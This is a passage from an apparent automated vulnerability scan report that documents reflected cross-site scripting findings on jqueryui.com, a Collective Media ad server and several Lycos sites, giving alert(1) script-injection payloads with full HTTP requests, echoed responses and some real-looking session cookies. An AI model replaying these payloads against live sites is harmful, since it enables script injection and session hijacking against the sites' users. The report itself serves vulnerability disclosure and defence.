=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
<meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" /> <meta nam ...[SNIP]... t=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=4545451f31c"><script>alert(1)</script>a87b30d1a5d&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpa ...[SNIP]...
3.110. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://jqueryui.com
Path: /themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deade"><script>alert(1)</script>1bd88013d0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?deade"><script>alert(1)</script>1bd88013d0d=1 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:34:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 117121
The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6323d"><script>alert(1)</script>e503afc2b was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px6323d"><script>alert(1)</script>e503afc2b&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:53 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120061
The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7b29"><script>alert(1)</script>6aefc48648e was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8pxa7b29"><script>alert(1)</script>6aefc48648e&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:51 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d012"><script>alert(1)</script>1062076bf26 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305d012"><script>alert(1)</script>1062076bf26&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:35 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd14c"><script>alert(1)</script>f7a209fba9 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30dd14c"><script>alert(1)</script>f7a209fba9&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120064
The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5e33"><script>alert(1)</script>b5761ac56ec was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxc5e33"><script>alert(1)</script>b5761ac56ec&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b947'-alert(1)-'faa1d4c7922 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/cm.idg_b2c5b947'-alert(1)-'faa1d4c7922/;sz=728x90;net=cm;ord=5241744;env=ifr;ord1=854900;cmpgurl=http%253A//mail.lycos.com/lycos/Index.lycos? HTTP/1.1 Host: k.collective-media.net Proxy-Connection: keep-alive Referer: http://www.mail.lycos.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sun, 12 Dec 2010 14:27:46 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net Content-Length: 7380
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-57666374_1292164066","http://ib.adnxs.com/ptj?member=311&inv_code=cm.idg_b2c5b947'-alert(1)-'faa1d4c7922&size=728x90&referrer=http%3A%2F%2Fmail.lycos.com%2Flycos%2FIndex.lycos&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.idg_b2c5b947%27-alert%281%29-%27faa1d4c7922%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-57666374_1 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee53c'-alert(1)-'3c2da3549e8 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/cm.idg_b2c/;sz=ee53c'-alert(1)-'3c2da3549e8 HTTP/1.1 Host: k.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc-dal; optout=1; JY57=opt_out;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7288 Date: Sun, 12 Dec 2010 14:34:24 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-41320597_1292164464","http://ib.adnxs.com/ptj?member=311&inv_code=cm.idg_b2c&size=ee53c'-alert(1)-'3c2da3549e8&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.idg_b2c%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-41320597_1292164464%2C%2Cnone%2C%3B%3Bcmw%3Dnurl%3Bsz%3Dee53c%27-alert%281%29-%273c2da3549e8%3Bcontx%3Dnone ...[SNIP]...
3.118. http://peoplesearch.lycos.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://peoplesearch.lycos.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2147"><script>alert(1)</script>caa0e56bdf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=people&b2147"><script>alert(1)</script>caa0e56bdf9=1 HTTP/1.1 Host: peoplesearch.lycos.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:28:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19486
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?tab=people&b2147"><script>alert(1)</script>caa0e56bdf9=1&mobile=1"> ...[SNIP]...
The value of the search-type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f361d"><script>alert(1)</script>60b9214b859 was submitted in the search-type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=people&search-type=white_pagesf361d"><script>alert(1)</script>60b9214b859 HTTP/1.1 Host: peoplesearch.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:41 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18746
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?tab=people&search-type=white_pagesf361d"><script>alert(1)</script>60b9214b859&mobile=1"> ...[SNIP]...
The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7863b"><script>alert(1)</script>a804a600e0d was submitted in the tab parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=people7863b"><script>alert(1)</script>a804a600e0d HTTP/1.1 Host: peoplesearch.lycos.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:28:46 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?tab=people7863b"><script>alert(1)</script>a804a600e0d&mobile=1"> ...[SNIP]...
3.121. http://peoplesearch.lycos.com/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://peoplesearch.lycos.com
Path: /index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 353e6"><script>alert(1)</script>5876eddc96c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?353e6"><script>alert(1)</script>5876eddc96c=1 HTTP/1.1 Host: peoplesearch.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:46 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19469
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?353e6"><script>alert(1)</script>5876eddc96c=1&mobile=1"> ...[SNIP]...
3.122. http://registration.lycos.com/forgot.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://registration.lycos.com
Path: /forgot.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f715"><script>alert(1)</script>0a78a0c622c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /forgot.php/4f715"><script>alert(1)</script>0a78a0c622c HTTP/1.1 Host: registration.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:51 GMT Server: Set-Cookie: PENTA=174.121.222.18.1292164491267196; path=/; domain=.lycos.com X-Powered-By: PHP/5.1.6 Set-Cookie: isMobile=deleted; expires=Sat, 12-Dec-2009 14:34:50 GMT Set-Cookie: isMobile=mobile; expires=Sun, 12-Dec-2010 15:34:51 GMT; path=/; domain=lycos.com Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Content-Length: 5935 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>LYCOS NETWORK: Registration Forgot Password</title>
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a61f"><script>alert(1)</script>cb2791bb9c4 was submitted in the cat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=multi&cat=images6a61f"><script>alert(1)</script>cb2791bb9c4 HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:35:04 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:04 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17603
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://mail.lycos.com/?utm_source=lycostab_images6a61f"><script>alert(1)</script>cb2791bb9c4&utm_campaign=home_mail&utm_medium=networkbar"> ...[SNIP]...
The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b88f"%3balert(1)//ab61ce09937 was submitted in the cat parameter. This input was echoed as 2b88f";alert(1)//ab61ce09937 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
